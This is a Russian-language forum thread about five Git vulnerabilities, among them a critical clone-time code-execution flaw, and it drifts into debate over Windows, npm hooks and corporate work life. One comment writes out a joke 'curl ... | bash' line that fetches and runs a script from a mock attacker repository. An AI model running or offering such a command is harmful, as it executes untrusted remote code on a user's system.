The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Пять уязвимостей в Git, среди которых одна критическая и две опасные"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Пять уязвимостей в Git, среди которых одна критическая и две опасные"  +/
Сообщение от opennews (??), 16-Май-24, 00:25 
Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2 и 2.39.4, в которых устранены пять уязвимостей. Наиболее серьёзная уязвимость (CVE-2024-32002), которой присвоен критический уровень опасности, позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone" репозитория, подконтрольного атакующему...

Подробнее: https://www.opennet.me/opennews/art.shtml?num=61180

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (1), 16-Май-24, 00:25 
Для симлинков в винде нужны права администратора.
Ответить | Правка | Наверх | Cообщить модератору

5. "Пять уязвимостей в Git, среди которых одна критическая и две..."  –2 +/
Сообщение от Аноним (1), 16-Май-24, 00:32 
Вернее не права администратора, а SeCreateSymbolicLinkPrivilege (которая обычно даётся при "Запустить от имени админестратора").
Ответить | Правка | Наверх | Cообщить модератору

6. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от нах. (?), 16-Май-24, 00:39 
найди мне модного современного разработчика-под-линукс не выклянчившего/вымутившего/вышантажировавшего себе админских прав на своей вянде?

Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

11. "Пять уязвимостей в Git, среди которых одна критическая и две..."  –1 +/
Сообщение от pavlinux (ok), 16-Май-24, 00:50 
Ну я, чо дальше? :
Ответить | Правка | Наверх | Cообщить модератору

16. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +5 +/
Сообщение от Аноним (16), 16-Май-24, 01:07 
Непонятно, зачем нужен эксплойт, если можно сказать ему запустить `curl https://github.com/jiatan/pwnd/blob/master/install.sh | bash', и он запустит
Ответить | Правка | Наверх | Cообщить модератору

32. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +3 +/
Сообщение от Аноним (32), 16-Май-24, 06:21 
Между git и curl | bash большая разница. Человек, запускающий curl | bash, понимает, что запустит код. А при клонировании git-репозиториев код должен только скачиваться, но не запускаться - но таки запускается. Это как если бы при просмотре специально подготовленной картинки все куки из браузера отправлялись кому не надо.
Ответить | Правка | Наверх | Cообщить модератору

53. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от кент кента (?), 16-Май-24, 11:47 
>Человек, запускающий curl | bash, понимает, что запустит код.

но если скрипт больше 5 строчек, то проверять всё равно лень

Ответить | Правка | Наверх | Cообщить модератору

84. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (84), 18-Май-24, 12:16 
"Две большие разницы" - заинтересовать запуском скрипта и заинтересовать просмотром кода.

Скрипты запускают неинтересные хомки.
А почитать код любят куда более интересные люди.

Ответить | Правка | Наверх | Cообщить модератору

35. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от User (??), 16-Май-24, 07:30 
Этож как накосячить-то надо было, чтоб совсем-совсем не выдали, а? Порнобаннеров с шифррвальщиками с варезника нацеплял, или что?
Ответить | Правка | К родителю #11 | Наверх | Cообщить модератору

40. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от Аноним (40), 16-Май-24, 09:49 
варианта с отсутствием венды не рассматривали совсем? по какой причине?
Ответить | Правка | Наверх | Cообщить модератору

51. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +3 +/
Сообщение от User (??), 16-Май-24, 11:29 
> варианта с отсутствием венды не рассматривали совсем? по какой причине?

Ну, иногда ж работать приходится, а не только конфиг vim'а вылизывать - и если эта работа не сводится к "программировай-администрировай!" (И то - с нюансами) или там "в одной единственной программе кнопка нажимай"\"уеб-интерфейс ковыряй" - то тут ээээ... без вариантов кагбэ.
Банально по скупь4бузинесс с клиентом пообщаться - уже чаллендж, в аутлуке переговорку забронировать - импоссибля, по VPN'у с комплаенс-чеком куда-то подключиться - удачи, сынок! (Оно и с виндой-то не любой и не везде сунешься - для того же "Сибура" у меня вон - отдельный букварь на столе стоит с отдельным etoken'чиком...) Да чо там - банально, пару правок в сверстанный в word'е по ГОСТу проект внести из этого вашего совсем-совсемлибреописа  - может превратиться в увлекательное приключение на пару дней для всех участников совместной работы... И вот кому оно "надь"?
WSL2 примерно 100% рабочих задач покрывает - а если уж совсем "Пепел Клааса стучится" - в тот же hyper-v можно обычную виртуалку забабахать и инжоиться чувством нитакусичности...

Ответить | Правка | Наверх | Cообщить модератору

61. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от Аноним (61), 16-Май-24, 16:27 
Ну не знаю. Винды не видел уже года с 2009-го, в последнее время вообще ни с чем никаких проблем не возникало даже с заказчиками с виндовой инфраструктурой. MS Teams и прочие аутлуки-офисы через веб нормально работают, AnyConnect под Линукс есть, кривой, но работает. Скайп в последний раз заказчик использовал 8 лет назад, тогда он работал, и уже тогда это воспринималось как что-то ретроградное.

JetBrain-овские IDE с тех пор, как они начали с собой таскать свой патченный JRE (давно), под Линуксом работает вообще без нареканий (были, разве что, небольшие проблемы с монитором с нестандартным devicePixelRatio). Докер нативный, никаких проблем с производительностью I/O, как на Маке или Винде с дополнительной прослойкой виртуализации, нет по определению.

Насчёт всяких ГОСТов, это, к счастью, мне не грозит, но уж у вас-то там в вашей ситуации точно стрёмно завязываться на зарубежного вендора.

Ответить | Правка | Наверх | Cообщить модератору

64. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от User (??), 16-Май-24, 18:12 
>[оверквотинг удален]
> нормально работают, AnyConnect под Линукс есть, кривой, но работает. Скайп в
> последний раз заказчик использовал 8 лет назад, тогда он работал, и
> уже тогда это воспринималось как что-то ретроградное.
> JetBrain-овские IDE с тех пор, как они начали с собой таскать свой
> патченный JRE (давно), под Линуксом работает вообще без нареканий (были, разве
> что, небольшие проблемы с монитором с нестандартным devicePixelRatio). Докер нативный,
> никаких проблем с производительностью I/O, как на Маке или Винде с
> дополнительной прослойкой виртуализации, нет по определению.
> Насчёт всяких ГОСТов, это, к счастью, мне не грозит, но уж у
> вас-то там в вашей ситуации точно стрёмно завязываться на зарубежного вендора.

Ну в общем хотелось бы как-то так - но по роду деятельности встречаются всякие ушибнутые инфобезом в тяжкой степени - teams on prem нет - давай skype4b(!=skype), а то и вовсе bitrix, OWA - харам, и даже с телефона почта только через vmware'вскую BYOD-примочку, o365 - облачный - пшелнафиг, VPN? Лехко - но только после проверки, что диск зашифрован, установлены апдейты безопасности, антивирус из белого списка с обновленными базами и разрешенное к использованию ПэО и та дэ и та пэ. У нас жеж тут все больше Критическая Информационная Инфраструктура, а не ларек по продаже кока-колы(Ц)
При этом "зарубежность" вендора парадоксальным образом никого по большому счету не напрягает - такой вот плюрализм мненьев в отдельно взятой голове.

Ответить | Правка | Наверх | Cообщить модератору

69. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от Аноним (61), 16-Май-24, 19:20 
А, ну да, с такими тяжело. Сочувствую. Я предпочитаю работать с малым-средним частным бизнесом, стартапами сегодняшними или вчерашними. Интересной работы много, платят хорошо, когда понимают за что (за результат качественно и в срок), мозги никто не компостирует. Да, есть и минусы - бизнес может прогореть, стартап может не получить очередой раунд инвестиций, ну и ладно, другие довольно быстро найдутся.
Ответить | Правка | Наверх | Cообщить модератору

74. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от Аноним (-), 17-Май-24, 04:42 
> А, ну да, с такими тяжело. Сочувствую. Я предпочитаю работать с малым-средним
> частным бизнесом, стартапами сегодняшними или вчерашними. Интересной работы много, платят
> хорошо, когда понимают за что (за результат качественно и в срок),
> мозги никто не компостирует.

Вот, еще 1 анон понимает прелести подобных направлений. А ты дорогой user наслаждайся своими наручниками с батареей, рассказывая как там цепь не должна быть длинной, и вообще, гестапа рулит, типа. Пусть у таких как user и рулит - и так им и надо! :)

> Да, есть и минусы - бизнес может прогореть, стартап может не получить очередой
> раунд инвестиций, ну и ладно, другие довольно быстро найдутся.

Стартапа конечно может постичь факап, но если не идиотничать - это не является чем-то фатальным. А бонусом вон тот лох - в офисе сидит. А я пошлю всех в пень на время да покручу педальки на веле, на свежем воздухе, в красивом пейзаже, если погода способствует. По сравнению с пыльным офисом... сами понимаете...

Ответить | Правка | Наверх | Cообщить модератору

87. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от User (??), 20-Май-24, 12:14 
Ну в общем не буду спорить - все так и есть. У каждого выбора свои плюсы и свои минусы.
С возрастом понимаешь (Ну... я - понял), что они не сводятся к "выбору инструмента" (Году в 10м для меня это был принципиальный вопрос, кстати - я занимался импортозамещением еще когда это не было мейнстримом :)) а болтаются большей частью ну вот вообще не в технической плоскости.
Кстати, заниматься шоссейным велоспортом работа в энтерпрайз-энтерпрайзе вот никак не мешает, честно. Во времена не столь отдаленные вот и вовсе триатлоном за корп. счет (по слот на айронмен включительно) страдал... ну или наслаждался, тут уже даже не знаю, как правильней ;)
Ответить | Правка | Наверх | Cообщить модератору

88. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (-), 20-Май-24, 16:55 
> Ну в общем не буду спорить - все так и есть. У каждого выбора свои плюсы и свои минусы.

Опция жить как рабу - мне чем-то не нравится.

> С возрастом понимаешь (Ну... я - понял), что они не сводятся к
> "выбору инструмента" (Году в 10м для меня это был принципиальный вопрос,

Я понял что возможность пойти поплавать, на веле погонять, или что я там хотел, пока на тебя орет тупарь-шеф, ты примотан к своему офисному креслу цепью под угрозой увольнения, и проч, таки нехилый апгрейд качества жизни, имхо. Да, некоторые решения могут мне стоить денег или репутации, но это мои решения. А если я не хочу делать энный таск - хрен что сделаешь, кроме поиска другого исполнителя. Для меня это важно, это мой психологический комфорт.

> кстати - я занимался импортозамещением еще когда это не было мейнстримом
> :)) а болтаются большей частью ну вот вообще не в технической плоскости.

Я рад за вас, все такое, все дела, yada-yada...

> Кстати, заниматься шоссейным велоспортом работа в энтерпрайз-энтерпрайзе вот никак не
> мешает, честно.

Лично я горняки предпочитаю. Чтобы крутить не по в@нючему шоссе а - почти везде, и с более симпотным пейзажем. А энтерпрайзы большие, не особо гибкие, доставучие, от несимпатичного таска можно отделаться только радикальным увольнением иной раз. Ну их нафиг.

> за корп. счет (по слот на айронмен включительно) страдал... ну или
> наслаждался, тут уже даже не знаю, как правильней ;)

Думаю что мне в энтерпрайзах не нравится кое-что другое. Общий климат в них и интрузивность в личную жизнь в паре с негибкостью. То что получается - сложно называть свободным человеком.

Ответить | Правка | Наверх | Cообщить модератору

91. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от User (??), 20-Май-24, 20:37 
>> Ну в общем не буду спорить - все так и есть. У каждого выбора свои плюсы и свои минусы.
> Опция жить как рабу - мне чем-то не нравится.
> Я понял что возможность пойти поплавать, на веле погонять, или что я
> там хотел, пока на тебя орет тупарь-шеф, ты примотан к своему
> офисному креслу цепью под угрозой увольнения, и проч, таки нехилый апгрейд
> качества жизни, имхо. Да, некоторые решения могут мне стоить денег или
> репутации, но это мои решения. А если я не хочу делать
> энный таск - хрен что сделаешь, кроме поиска другого исполнителя. Для
> меня это важно, это мой психологический комфорт.

Я кажись понял, в чем тут у нас расхожденья. Пред-по-ла-гаю, что если карьеру начинать с какой-нибудь "поддержки-рабочих-мест" пятачок-за-пучок или там "личинки погроммизда" стажером после института - то оно как-то так и может выглядеть. В плохом месте, ага.
А если попасть в совсем-совсем тырдырпрайз с уровня ну хотя бы среднего звена менеджера (Про архитектора, руководителя направления и т.д - не говорю) - все выглядит мал-мала иначе. Нет, бывают совсем упоротые места ("Приходить на работу в 08:00 - ваша обязанность, задерживаться до 20:00 - ваше право"(С), своими ушами слышал) - но в них и впрямь, незачем работать.
/Слушать ор тупаря-клиента это конечно совсем-совсем другое, да./

>> Кстати, заниматься шоссейным велоспортом работа в энтерпрайз-энтерпрайзе вот никак не
>> мешает, честно.
> Лично я горняки предпочитаю. Чтобы крутить не по в@нючему шоссе а -
> почти везде, и с более симпотным пейзажем. А энтерпрайзы большие, не
> особо гибкие, доставучие, от несимпатичного таска можно отделаться только радикальным
> увольнением иной раз. Ну их нафиг.

2,5 размеченные XC'шные трассы + 1 даунхильная на город-миллионник. Ну, еще пара лыжных баз, да. В общем, если "за спорт" - то в шоссе видового туризма(ТМ) кратно больше. На урале, по крайней мере.
Если про "покатушки", то MTB и вправду удобней - но когда я понял, что 80% времени на подвесе качу по асфальту - продал и его и хардтейл. Была мысля про гравел - но чот наверное уже и не соберусь.

> Думаю что мне в энтерпрайзах не нравится кое-что другое. Общий климат в
> них и интрузивность в личную жизнь в паре с негибкостью. То
> что получается - сложно называть свободным человеком.

Нуууу... на низовых должностях скорее наоборот - приехал на заводском басике к началу смены - в конце смены на ём же уехал, и спроса с тебя - ну вот ровно никакого. На половину долюбок можешь смело ссылаться на свою ДИ - нет у них методов супротив Костей Сапрыкиных.
Выше + проектная деятельность, а не линейка - уже да. Ненормированный рабочий день, "роди-и-скажи-что-украл" вот это всё - но тут скорее всего и не в энтерпрайзе схожего уровня так же. Ту же удаленку с уровня "менеджера среднего звена" или там "эксперта по направлению" в большинстве мест - вообще не вопрос, даже при специфике работы, требующей периодического присутствия на площадке какую-нибудь 3\2 для ИТшника организовать согласятся примерно "везде".
Вот стремление влезть куда не просят - наличествует примерно "всегда". А давайте-ка организуем вам медосмотр с диспансеризацией - вот прям исключительно в ваших интересах - но отказаться нельзя. И на первомайскую демонстрацию - у нашего предприятия традиция с тыща-девясот-двасать-лохматого-года - все ходят. Да, скажите пожалуйста, как и когда вы планируете голосовать? Срок заполнения опросного листа - сегодня до 12 МСК! А после голосования - сообщите специально выделенному человеку для внесения в список, цель по предприятию - 85% проголосовавших в первый день(Ц). Бесит, но не сильно, с этим 1,5 раза в год сталкиваешься. Рассея-с.
Всякие чисто corporate-скиллы, которые не переносятся и на каждом месте разные - бесят кратно сильнее. Да рот я любил ваши особенности бюджетирования проектов в SAP. И специфику учета лицензий - туда же. И закупочные процедуры. А особенности электронного документооборота в directum - ах, у вас documentum, и "этадругое!" - и вовсе в зад. А процедуру оформления командировок с заказом билетов\оформлением отеля из списка одобренных через электронную систему деловых путешествий(ТМ) - так уж и быть, любил традиционным способом, вместе с последующей отчетностью.
А, еще из бесявого - всякая постановка целей (А как ваши личные цели связаны с целью подразделения? А цели подразделения - с задачами предприятия? Аааа... Уууу... А как задача Х SMART'уется? Вы не думали, что...) и "индивидуальные планы развития" с "карьерными треками" и вот этим всем. И не дай б-же встрянешь в какое моднючее 5С с бережливым производством - тут правда может оказаться проще уволиться нафиг, чем этих сектантов удовлетворять.

Но если так подходить - в любом сегменте свои бесячие приколюхи будут

Ответить | Правка | Наверх | Cообщить модератору

89. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (-), 20-Май-24, 16:57 
> мешает, честно. Во времена не столь отдаленные вот и вовсе триатлоном
> за корп. счет (по слот на айронмен включительно) страдал... ну или
> наслаждался, тут уже даже не знаю, как правильней ;)

p.s.  и да, ты не можешь себе даже близко представить как я ненавижу все эти твои "аттестованные рабочие места" и прочий ультра-хардкор булшит. Это такое вторжение и рабство что - покорно благодарю - но с таким я не "agree" и никогда не буду. И у меня достаточно бабок чтобы купить себе "средства производства" в вот именно лично мою собственность. Без выслушивания булшита что этот комп собственность фирмы, блаблабла.

Ответить | Правка | К родителю #87 | Наверх | Cообщить модератору

92. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от User (??), 20-Май-24, 20:40 
>> мешает, честно. Во времена не столь отдаленные вот и вовсе триатлоном
>> за корп. счет (по слот на айронмен включительно) страдал... ну или
>> наслаждался, тут уже даже не знаю, как правильней ;)
> p.s.  и да, ты не можешь себе даже близко представить как
> я ненавижу все эти твои "аттестованные рабочие места" и прочий ультра-хардкор
> булшит. Это такое вторжение и рабство что - покорно благодарю -
> но с таким я не "agree" и никогда не буду. И
> у меня достаточно бабок чтобы купить себе "средства производства" в вот
> именно лично мою собственность. Без выслушивания булшита что этот комп собственность
> фирмы, блаблабла.

Ну, не всем же в ларьке по продаже кока-колы, работать, да? Кому-то вот приходится и задницу бумажками прикрывать - ответственность перекладывать, будем с пониманием относиться к проблемам инфобезников, ага? Вопрос не в "достаточно"\"не достаточно" бабок на покупку ПК, а в том, кто случись что турма сидеть будет. У монтажника может быть тоже денег на стремянку из леруа мерлен хватит - но за попытку затащить её на территорию он гарантированно получит двойную дозу решительных звиздюлей, ибо.

Ответить | Правка | Наверх | Cообщить модератору

85. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Рмшъ (?), 20-Май-24, 11:03 
Есть ведь и фронтендеры на удалёнке. Переговорки не актуальны, с заказчиками общается менеджер, по vpn ходит бэкендер, госты вообще в последний раз были в универе ещё до Медведева.
Ответить | Правка | К родителю #51 | Наверх | Cообщить модератору

86. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от User (??), 20-Май-24, 11:14 
> Есть ведь и фронтендеры на удалёнке. Переговорки не актуальны, с заказчиками общается
> менеджер, по vpn ходит бэкендер, госты вообще в последний раз были
> в универе ещё до Медведева.

"если эта работа не сводится к "программировай-администрировай!"(И то - с нюансами)"(Ц)

Ответить | Правка | Наверх | Cообщить модератору

42. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от нах. (?), 16-Май-24, 09:52 
> Этож как накосячить-то надо было, чтоб совсем-совсем не выдали, а? Порнобаннеров с
> шифррвальщиками с варезника нацеплял, или что?

небось как тот инженер у нас - "а я уже диск отформатировал, дайте установочный, пазазя".

Видимо что-то там такое было, что нам показывать никак нельзя.

Ответить | Правка | К родителю #35 | Наверх | Cообщить модератору

33. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (33), 16-Май-24, 06:36 
Никого не волнует что там в винде происходит
Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

34. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (34), 16-Май-24, 07:08 
То ли дело 2%, ага.
Ответить | Правка | Наверх | Cообщить модератору

36. "Пять уязвимостей в Git, среди которых одна критическая и две..."  –1 +/
Сообщение от Аноним (36), 16-Май-24, 08:26 
~4.8% без учёта ChromeOS
Ответить | Правка | Наверх | Cообщить модератору

38. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от Аноним (34), 16-Май-24, 08:34 
https://radar.yandex.ru/desktop утверждает иное: 2.77% всего недесктопного кроме винды и макоси. В общем на уровне погрешности измерений.
Ответить | Правка | Наверх | Cообщить модератору

63. "Пять уязвимостей в Git, среди которых одна критическая и две..."  –1 +/
Сообщение от Аноним (61), 16-Май-24, 16:40 
Ага, и все в этой статистике - разработчики, использующие git :-)

Даже на Винде, скорее всего, половина пользуются гитом внутри WSL.

Ответить | Правка | Наверх | Cообщить модератору

65. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (65), 16-Май-24, 18:19 
На кой? Конкретно у меня под виндой гит нативный стоит, а не в виртуалке с ненужным. За всех остальных говорить не буду, но скорее всего то же самое.
Ответить | Правка | Наверх | Cообщить модератору

78. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от нах. (?), 17-Май-24, 12:42 
> Даже на Винде, скорее всего, половина пользуются гитом внутри WSL.

на винде гит встроен в visual studio (не шва6одкину подделку а настоящую)

Прям при запуске спрашивает тебя - откуда тебе начекаутить и куда потом пульнуть. "проекты" в "новаяпапка 244" у MS давно уже немодно, они развивают технологии.

Ответить | Правка | К родителю #63 | Наверх | Cообщить модератору

79. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (79), 17-Май-24, 13:57 
Ко встроенным эта уязвимость не относится же? Или там не что-то вроде libgit2, а тупо консольный git с собой таскают и exec-ают?
Ответить | Правка | Наверх | Cообщить модератору

83. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от нах. (?), 17-Май-24, 19:32 
> Ко встроенным эта уязвимость не относится же? Или там не что-то вроде
> libgit2, а тупо консольный git с собой таскают и exec-ают?

да скорее всего именно консольный, вдруг тебе понадобится что-то нестандартное сделать, и ты его руками захочешь запустить. Или он окажется внутри cmake'ового макроса (да, студия еще и cmake имеет внутре)

Ответить | Правка | Наверх | Cообщить модератору

81. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от Аноним (81), 17-Май-24, 14:23 
> на винде гит встроен в visual studio (не шва6одкину подделку а настоящую)

это какой-то позор. Такая огромная компания с миллиардными доходами и полной монополией на десктоп с начала 1990х годов и юзают какую-то поделку одного человека. При том что всю своб жизнь занимались дискредитацией и поливанием опенсорса. А тут на тебе, встроили вражеский гит себе. Хахаха, позорище. А что не свой позорный TFS?

Ответить | Правка | К родителю #78 | Наверх | Cообщить модератору

82. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +2 +/
Сообщение от нах. (?), 17-Май-24, 19:30 
ну да, ну да, одного. Пара сотен разработчиков (кажется, кто-то работал на MS) не в счет ведь.

"в очередной раз microsoft сделала для опесорса за день больше чем все л@п4@тые за всю жизнь" - например, когда добавила туда LFS extension.

Ответить | Правка | Наверх | Cообщить модератору

46. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Да ну нахер (?), 16-Май-24, 10:09 
Можно в режим разработчика перевести, тогда не нужны. Правда нужны права на сам перевод.
Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

3. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +7 +/
Сообщение от Аноним (3), 16-Май-24, 00:26 
> приведёт к выполнению этих hook-ов

Хуки -- мерзотнейшая штука. Сразу вырубаю эту херню к чертям собачьим. К примеру, в веб-проектах хуки устанавливаются таким куском фекалий, как npm-пакет husky. Прикиньте, делаю гит коммит, не имея nodejs в $PATH, и тут вдруг гит ругается, что хук ругается, что nodejs не найден. Я на такое как бы не подписывался, какого ху_ гит запускает какой-то васянский код при гит-коммите? Ах да, postinstall-скрипты тоже надо вырубать нахрен через .npmrc. Если вы этого не сделали, любой васян из интернета сможет запускать код под вашими правами и воровать ваш ~/.config/chromium. Посчитать, скольки васянам вы даете полные права на вашу систему: find node_modules -name package.json | wc -l

Ответить | Правка | Наверх | Cообщить модератору

4. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от Аноним (1), 16-Май-24, 00:29 
>хуки устанавливаются таким куском фекалий, как npm-пакет husky

Так и запишем: "вредоносное ПО".

Ответить | Правка | Наверх | Cообщить модератору

48. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от Аноним (-), 16-Май-24, 10:35 
>> хуки устанавливаются таким куском фекалий, как npm-пакет husky
> Так и запишем: "вредоносное ПО".

NPM состоит из него чуть менее чем полностью. И репа и сама эта штука.

Ответить | Правка | Наверх | Cообщить модератору

8. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +3 +/
Сообщение от Васян (?), 16-Май-24, 00:47 
Так тут не git, а npm пачкает все фекалиями
Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору

60. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Бывалый Смузихлёб (ok), 16-Май-24, 15:22 
> Так тут не git, а npm пачкает все фекалиями

пачкают, зачастую, cильно умные проггеры-олимпиадники
Мол, а давайте, чтобы был не просто коммит, а ещё и целая куча гомна исполнялась, которая может падать при любом чихе и код заливаться не будет. А, где нет залитого кода - там нет и начала сборки по событию в рамках СИ/СД. Разумеется, с подтягиванием горы пакетов, включая устаревшие и не очень-то работающие где-то кроме одной-единственной ОС одной конкретной версии

В итоге, задача на 15 мин запросто превращается в задачу на день с ковырянием даром ненужной ерунды, а то и несколько дней, если предстоят выходные и праздники

Ответить | Правка | Наверх | Cообщить модератору

14. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +5 +/
Сообщение от Витюшка (?), 16-Май-24, 00:57 
Так это касается любых языков программирования и систем сборки и репозиториев и любых пакетов дистрибутива - там тоже выполняются postinstall bash-портянки, только от рута уже.

Проблема в ужасной "безопасности" Linux для десктопов. Когда любой Вася получает доступ ко всему home. Мне как раз на системные файлы плевать - снёс/заново установил и проблем нет.

Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору

29. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от penetrator (?), 16-Май-24, 03:14 
это касается не только Linux
Ответить | Правка | Наверх | Cообщить модератору

37. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (36), 16-Май-24, 08:30 
>Мне как раз на системные файлы плевать - снёс/заново установил и проблем нет.

Ага, только если вовремя заметил/догадался, что это срочно необходимо сделать.

Ответить | Правка | К родителю #14 | Наверх | Cообщить модератору

56. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (56), 16-Май-24, 14:35 
Стандартные пакеты ревьювят, а хлам от JS мaкaк - нет
Ответить | Правка | К родителю #14 | Наверх | Cообщить модератору

17. "Пять уязвимостей в Git, среди которых одна критическая и две..."  –1 +/
Сообщение от Аноним (17), 16-Май-24, 01:43 
NPM по хорошему в докер убирать надо.
Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору

20. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +2 +/
Сообщение от Аноним (20), 16-Май-24, 02:08 
Попрошу ещё поглубже, пожалуйста
Ответить | Правка | Наверх | Cообщить модератору

25. "Пять уязвимостей в Git, среди которых одна критическая и две..."  –1 +/
Сообщение от Аноним (25), 16-Май-24, 02:35 
Докер стоит денег. И в целом от этой проблемы вас не спасёт.
Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору

49. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (-), 16-Май-24, 10:36 
> NPM по хорошему в докер убирать надо.

А там бэкдор типа нещитово? :)

Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору

68. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (68), 16-Май-24, 18:41 
> Хуки -- мерзотнейшая штука

Абсолютно солидарен! ЛЮБОЙ формат, позволяющий "немножко скриптогадить", фтопку. Я удивился, что даже шрифты(!!!!) могут исполнять код - вот уж где крыса навнедряла!

Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору

80. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (79), 17-Май-24, 14:02 
Это всё привет от технологий начала 80-х, когда засунуть везде свой Тьюринг-полный DSL казалось прекрасной идеей - гибко же ж. До червя Морриса оставалось ещё 5 лет.
Ответить | Правка | Наверх | Cообщить модератору

12. "Пять уязвимостей в Git, среди которых одна критическая и две..."  –8 +/
Сообщение от pavlinux (ok), 16-Май-24, 00:51 
> позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone"

позволяет добиться выполнения кода при выполнении кода // fixed

> Клонирование этого репозитория приведёт к выполнению кода с правами пользователя, выполняющего операцию клонирования.

выполнению кода с правами пользователя, выполняющего код // fixed

Ответить | Правка | Наверх | Cообщить модератору

31. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +2 +/
Сообщение от Аноним (31), 16-Май-24, 06:03 
Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого клонирования репозитория тебе еще неожиданно сносят хомяк.
Ответить | Правка | Наверх | Cообщить модератору

43. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от нах. (?), 16-Май-24, 09:53 
> Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого
> клонирования репозитория тебе еще неожиданно сносят хомяк.

не, ну вот сносить-то зачем? Чо вы как эти вот самые. Не сносить а добавить. Строчечку в authorized_keys , парочку сервисов, ну еще по мелочи.

Ответить | Правка | Наверх | Cообщить модератору

76. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (76), 17-Май-24, 04:47 
>> Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого
>> клонирования репозитория тебе еще неожиданно сносят хомяк.
> не, ну вот сносить-то зачем? Чо вы как эти вот самые. Не
> сносить а добавить. Строчечку в authorized_keys , парочку сервисов, ну еще
> по мелочи.

Да нафиг, каждому горе майнтайнеру - по мaйнeру! А такие как ты даже и добровольно запустят, если процент предложить. Главное чтобы шеф не спалил что кошель твой.

Ответить | Правка | Наверх | Cообщить модератору

77. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от нах. (?), 17-Май-24, 12:38 
> А такие как ты даже и добровольно запустят, если процент предложить.

у тебя бабла не хватит покрыть все риски и косвенные ущербы. А я умею считать.

> Главное чтобы шеф не спалил что кошель твой.

главное чтоб шеф не узнал про краденные тележки в Кельне.

Ответить | Правка | Наверх | Cообщить модератору

90. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (-), 20-Май-24, 17:05 
>> А такие как ты даже и добровольно запустят, если процент предложить.
> у тебя бабла не хватит покрыть все риски и косвенные ущербы. А я умею считать.

